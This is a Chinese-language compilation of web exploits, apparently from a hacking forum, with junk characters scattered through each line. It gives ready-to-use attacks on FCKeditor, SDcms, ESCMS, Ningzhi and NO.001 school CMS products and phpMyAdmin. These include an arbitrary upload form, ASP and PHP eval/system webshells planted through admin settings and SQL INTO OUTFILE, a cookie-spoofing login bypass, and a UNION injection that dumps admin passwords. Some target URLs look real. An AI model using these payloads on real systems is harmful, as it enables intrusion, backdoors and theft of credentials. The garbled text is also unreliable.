& v& }8 f. q9 j: z' W/ {如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
- i/ b4 `& D2 L- ~<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
- V' H, I' _% _- CUpload a new file:<br>
4 V$ b# X7 c" U2 v7 w; L8 `<input type="file" name="NewFile" size="50"><br>
q4 @# w' ]% @7 f0 N<input id="btnUpload" type="submit" value="Upload">
, ]6 y. T3 A" o% k% r; F. ~1 H4 h</form>
% L6 ^. H' X) ~-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 `* N6 q- W; I* K$ a5 l$ G- u. V% I( s
SDcms 后台拿webshell k o) g. m: E: q% l7 E$ o
0 L- K$ u9 k Y6 @第一种方法:
2 `/ @; E9 \0 w* M- |) P进入后台-->系统管理-->系统设置-->系统设置->网站名称;
9 M \ v) p( @' R把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
& G* r8 W! I& j用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
: g" ^, d0 k5 R0 n; l0 o第二种方法:% o# F0 U3 C! C' C/ F) @: i
进入后台-->系统管理-->系统设置-->系统设置->上传设置;$ ?* U5 i. w" L3 p& `. x& f
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
1 T4 W* }6 e5 o1 x% @第三种方法:4 ~, x' q: R% S$ @& D$ ?
进入后台-->界面管理-->模板文件管理-->创建文件
4 j* F6 z$ b b0 T文件名写入getshell.ashx
$ {, v' r+ M. c5 @$ ~内容写入下面内容:
s4 t& B. }; P" b/====================复制下面的=========================/
! k' H5 K' h1 v/ s J' [<%@ WebHandler Language="C#" Class="Handler" %>
+ H( a! L I0 ^, G$ T" l4 B! E3 c1 Yusing System;
0 H# _) ~( M \using System.Web;2 M+ u9 L/ t& D) F. _
using System.IO;6 U8 j( w/ b1 f2 k
public class Handler : IHttpHandler {) O# M! s' [, A: n8 Y' [
public void ProcessRequest (HttpContext context) {1 U3 S9 d7 i" Y- s5 D; ?$ ?
context.Response.ContentType = "text/plain";
, ~8 N4 q+ S d7 p7 g, A! bStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
6 c8 k$ g4 C% Q% ?, K2 n Y9 Ofile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");, R2 g) n4 \* L) f9 b
file1.Flush();- R) u6 e) Y- a+ p$ x: U
file1.Close();. z: i# ]# X% L/ z2 F1 H9 i, \ w; N
}
1 ^7 Z# `& W1 H6 `8 ~9 B! k% _- @8 u& Npublic bool IsReusable {
* G# u5 N8 j1 P% A" @get {* @: e4 @7 d/ B& o' N! p! m: o- H/ f
return false;
$ @( {# L% d$ s}) B, U% X( I3 r9 [9 o
}, v. u& v1 z5 E. @$ P
}: F5 {( @. u. ^; u8 S
/=============================================/
U4 _- K% e, y$ c; w7 i, _# M访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx( m" A# u3 u3 P- H- r
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接' C K& [5 u8 P2 q; Q1 l7 |
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------) e3 B/ D) M, @/ a5 j- S' v) u# {
2 T; n7 |" F, _
ESCMS网站管理系统0day
: Z- W2 B" U* V4 G: J
) ? l* D" _ ?' ?9 y( `后台登陆验证是通过admin/check.asp实现的
6 D! J; K" U7 j6 {: W
+ M. o. Z- u: B/ M R$ A首先我们打开http://target.com/admin/es_index.html
, t( m; [: b) h; T然后在COOKIE结尾加上& H- _" g4 u% ?
; ESCMS$_SP2=ES_admin=st0p;
# E/ O4 X4 V8 J9 Q0 t" u修改,然后刷新' {; p! e# I" h J, x; t% T
进后台了嘎..
: N$ M3 m7 Q4 I" q# n7 C然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
3 }& N$ o; Z! v( p" K! `1 e6 ]/ m* S7 `# `* o: V' i d; t
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.+ m- |; _9 [: l
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
+ z$ C3 B' g8 P; D5 I. p4 c# B存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..$ L" {% b) P1 j; h9 I' r) }
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了+ b% a& {4 M4 [
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------! y4 R: K& y7 p
4 H' I9 V) u! t* s1 B3 T宁志网站管理系统后台无验证漏洞及修复" N; F0 L( M3 n* e8 r7 d
8 S" G2 p3 U0 W1 |
网上搜了一下,好像没有发布.如有雷同纯粹巧合!5 t; b2 K0 m* i( O# B
官方网站:www.ningzhi.net3 D) G$ _8 F9 y" @ I
学校网站管理系统 V.2011版本
8 F6 ~/ ]& B) lhttp://down.chinaz.com/soft/29943.htm 2 C6 D% B# L7 y$ A! O( o9 g5 J
其它版本(如:政府版等),自行下载.7 u( Y$ j# [2 V1 D- ~
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~& d" B! `& I8 N$ F9 Q, i
login.asp代码如下: ^+ v1 v4 d q$ m& p- `0 m
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
$ L! }9 l0 Y' k$ l* wmanage.asp代码我就不帖出来了.反正也没验证. a7 o8 z- u# ~0 K, |8 n
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!! p! i9 J' L) S
漏洞利用:
0 G" w7 k8 G2 w7 S: F( `: \0 Z直接访问http://www.0855.tv/admin/manage.asp6 S2 F0 ]4 j- I8 l C
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5) D2 r% M( P6 Y& m
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 d" {5 Y- t3 m* B
/ D# `) Y+ U% K9 |) O5 E6 B" F/ jphpmyadmin拿shell的四种方法总结及修复+ R! p% h8 b8 z+ F& |2 _
' T& \% M" h) U; s7 l- v' {6 n) F J
方法一:
% T f2 y/ [, d l4 W uCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
/ X2 e( T! ]9 I" QINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');' X1 e0 W& l+ r+ W9 r0 p8 r; l
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';- x& ?7 O, v4 l9 [9 Y. w
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
5 C1 [. ?9 K9 d5 W 一句话连接密码:7on
/ p% F9 O/ J4 K1 h方法二: J8 z, G% a( n( b4 P# q5 b2 A+ A2 H
读取文件内容: select load_file('E:/xamp/www/s.php');
. O. h3 ]7 K5 B$ @; e' z写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
+ Q+ @7 @6 j9 a- a3 L' K* }) Icmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php') O# K& H! e5 M; G( ~1 a( O
方法三:
3 z3 T7 p w7 M$ y/ t. kJhackJ版本 PHPmyadmin拿shell
4 a8 G1 u1 ^) y+ {5 a0 N# OCreate TABLE study (cmd text NOT NULL);6 A' @* H6 o* r: K5 e+ w8 n
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');# a8 I! O9 L2 \( z6 L
select cmd from study into outfile 'E:/wamp/www/7.php';8 X# n+ G9 {; i/ Z4 z, ]
Drop TABLE IF EXISTS study;
( \+ y$ {/ W7 _- }8 e<?php eval($_POST[cmd])?>
+ R' r* F9 K" KCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。7 D v5 L* H6 |! A6 G7 g( @
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 13 I- k! J* d) {+ A+ P; h4 r1 o
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
0 ?& T% B% s& O+ x- s. u+ }/ xDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
; h% s: ^+ r9 `3 @' q% I方法四:( }5 C4 Q7 y, a$ M* g3 a$ r; _0 T
select load_file('E:/xamp/www/study.php');* Y& n' }7 K: ]7 `% N
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
0 ?% M0 s3 x6 |* {0 W8 E0 h然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
- s+ S$ U0 {% D$ N, E6 t-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 J6 w$ L, e$ K* [. a7 t2 T7 ]
5 x- d! e( E- |& cNO.001中学网站管理系统 Build 110628 注入漏洞
8 p% `" [5 ]% x6 m$ U' ^% y' K5 z$ u' Y, u2 z, R
NO.001中学网站管理系统功能模块:
' t/ w0 m' _, |3 G0 p* \) v1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等4 o- F8 V- ]$ |) |, s; \7 x, R
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
2 [: g, R( a$ @" Q V6 t3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息/ [6 X+ v, b) p9 ]3 {3 R
4.视频图片管理:一级分类,动态添加视频或者图片等信息4 Y0 K4 a3 d9 M
5.留言管理:对留言,修改,删除、回复等管理
" Q3 N- C6 p0 c" `' t# c6 o6.校友频道:包括校友资料excel导出、管理等功能
9 Q( }7 p2 \/ F+ W" `7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
% f% |! K# j0 B" F/ X) @* S4 d默认后台:admin/login.asp
8 C/ p( g9 W( D8 w& N" j官方演示:http://demo.001cms.net; {/ q8 b/ V+ o
源码下载地址:http://down.chinaz.com/soft/30187.htm
0 X: I8 ~ ]+ Z6 k. R, @8 l3 SEXP:1 `1 n9 ~, F' I" y3 A
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
; S7 @! c4 I+ I# \% Q测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
4 Y1 U5 G- T5 {: b5 k$ X5 Lgetshell:后台有备份,你懂的
! I, k/ a, H8 A0 ~9 L" _7 H另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
. O+ i' }* S1 r; y------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |